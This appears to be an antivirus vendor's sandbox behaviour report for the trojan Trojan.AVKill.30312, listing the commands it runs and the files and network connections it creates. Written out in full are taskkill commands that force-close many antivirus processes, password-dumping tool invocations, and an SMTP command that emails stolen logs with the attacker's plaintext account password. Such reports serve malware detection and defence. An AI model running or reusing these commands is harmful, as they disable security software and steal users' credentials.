Trojan.AVKill.30312

Technical Information

Malicious functions:

Creates and executes the following:

'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM VPTray.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM ccApp.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\68MNCYXSQP.exe' /stext 1.25.COPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\GI6TCD09NS.exe' /stext 1.37.WBPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM MsMpSvc.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM MsMpSvc /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM ccSvcHst.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM McUICnt.exe /F
'%TEMP%\RTYBVCKJ59.exe' /stext 1.80.MAPV
'%TEMP%\7NBZCOPSB8.exe' /stext 1.26.IXPS
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\009OJBCZRJ.exe' /stext 1.35.PSWF
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\12LMXIFVX0.exe' -to ne0n.logs@outlook.com -from neon.email_001@yahoo.com -ssl -smtp smtp.mail.yahoo.com -port 465 -sub "ne0n v1.0 Sun 04/21/2013 19:38:04.39 CRNJEUFU" -M "Computer Name: CRNJEUFU - Username: %USERNAME%" -auth -user neon.email_001 -pass ,SQOOGZnGYSf*FR2zZ/UCE)HOVvFL{vH -attach "ne0n_logs"
'<LS_APPDATA>\Xenocode\Sandbox\IE PassView\1.26\2013.03.29T17.03\Virtual\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\7NBZCOPSB8.exe' /stext 1.26.IXPS
'%TEMP%\12XVLGBG32.exe' /stext 1.42.MSPV
'<LS_APPDATA>\Xenocode\Sandbox\Mail PassView\1.80\2013.04.21T02.34\Virtual\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\mailpv.exe' /stext 1.80.MAPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\676NXZRKGD.exe' /stext 1.05.AOPV
'<LS_APPDATA>\Xenocode\Sandbox\MessenPass\1.42\2013.03.29T16.54\Virtual\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\12XVLGBG32.exe' /stext 1.42.MSPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\WScript.exe' "%TEMP%\RUN1234564.vbs"
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\12MNBXJJS0.exe' HBZMAQP109.zip
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM avgui.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\cmd.exe' /c ""%TEMP%\UBCALO8X0X.bat" "
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\cmd.exe' /c ""%TEMP%\INSTALL.bat" "
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Virtual\STUBEXE\8.0.1112\@APPDIR@\ne0n_v1.0 - Copy.Original_Icon.exe'
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\cmd.exe' /c ""%TEMP%\90MZALGFB3.bat" "
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\WScript.exe' "%TEMP%\RUN1234567.vbs"
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM avgcfgex.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM avp.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM VSSERV.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM msseces.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM AVP /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM bdagent.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM vprot.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM VSSERV /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM seccenter.exe /F

Terminates or attempts to terminate

the following user processes:

ccapp.exe
AVP.EXE
bdagent.exe

Modifies file system :

Creates the following files:

%TEMP%\RUN1234564.vbs
%TEMP%\UBCALO8X0X.bat
%TEMP%\RTYBVCKJ59
%TEMP%\7NBZCOPSB8
%TEMP%\GI6TCD09NS
%TEMP%\1.37.WBPV
%TEMP%\1.35.PSWF
%TEMP%\ne0n_logs
%TEMP%\1.05.AOPV
%TEMP%\1.25.COPV
%TEMP%\1.80.MAPV
%TEMP%\HBZMAQP109.abcdefg
%TEMP%\RUN1234567.abcdefg
%TEMP%\90MZALGFB3.abcdefg
%TEMP%\12MNBXJJS0.abcdefg
%TEMP%\INSTALL.bat
%TEMP%\676NXZRKGD
%TEMP%\68MNCYXSQP
%TEMP%\12XVLGBG32
%TEMP%\009OJBCZRJ
%TEMP%\12LMXIFVX0

Deletes the following files:

%TEMP%\1.37.WBPV
%TEMP%\1.25.COPV
%TEMP%\7NBZCOPSB8
%TEMP%\12LMXIFVX0
%TEMP%\1.80.MAPV
%TEMP%\ne0n_logs
%TEMP%\RUN1234564.vbs
%TEMP%\1.05.AOPV
%TEMP%\1.35.PSWF
%TEMP%\12MNBXJJS0.exe
%TEMP%\GI6TCD09NS
%TEMP%\RUN1234567.vbs
%TEMP%\HBZMAQP109.zip
%TEMP%\68MNCYXSQP
%TEMP%\676NXZRKGD
%TEMP%\009OJBCZRJ
%TEMP%\RTYBVCKJ59
%TEMP%\12XVLGBG32

Moves the following files:

from %TEMP%\68MNCYXSQP.exe to %TEMP%\68MNCYXSQP
from %TEMP%\RTYBVCKJ59.exe to %TEMP%\RTYBVCKJ59
from %TEMP%\GI6TCD09NS.exe to %TEMP%\GI6TCD09NS
from %TEMP%\7NBZCOPSB8 to %TEMP%\7NBZCOPSB8.exe
from %TEMP%\12LMXIFVX0 to %TEMP%\12LMXIFVX0.exe
from %TEMP%\7NBZCOPSB8.exe to %TEMP%\7NBZCOPSB8
from %TEMP%\12LMXIFVX0.exe to %TEMP%\12LMXIFVX0
from %TEMP%\009OJBCZRJ.exe to %TEMP%\009OJBCZRJ
from %TEMP%\12XVLGBG32.exe to %TEMP%\12XVLGBG32
from %TEMP%\676NXZRKGD.exe to %TEMP%\676NXZRKGD
from %TEMP%\12MNBXJJS0.abcdefg to %TEMP%\12MNBXJJS0.exe
from %TEMP%\GI6TCD09NS to %TEMP%\GI6TCD09NS.exe
from %TEMP%\HBZMAQP109.abcdefg to %TEMP%\HBZMAQP109.zip
from %TEMP%\90MZALGFB3.abcdefg to %TEMP%\90MZALGFB3.bat
from %TEMP%\RUN1234567.abcdefg to %TEMP%\RUN1234567.vbs
from %TEMP%\676NXZRKGD to %TEMP%\676NXZRKGD.exe
from %TEMP%\009OJBCZRJ to %TEMP%\009OJBCZRJ.exe
from %TEMP%\12XVLGBG32 to %TEMP%\12XVLGBG32.exe
from %TEMP%\68MNCYXSQP to %TEMP%\68MNCYXSQP.exe
from %TEMP%\RTYBVCKJ59 to %TEMP%\RTYBVCKJ59.exe

Network activity:

Connects to:

'67.##5.160.76':465

UDP:

DNS ASK sm##.#ail.yahoo.com

Miscellaneous:

Searches for the following windows:

ClassName: '' WindowName: ''

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

Technical Information

Curing recommendations

Free trial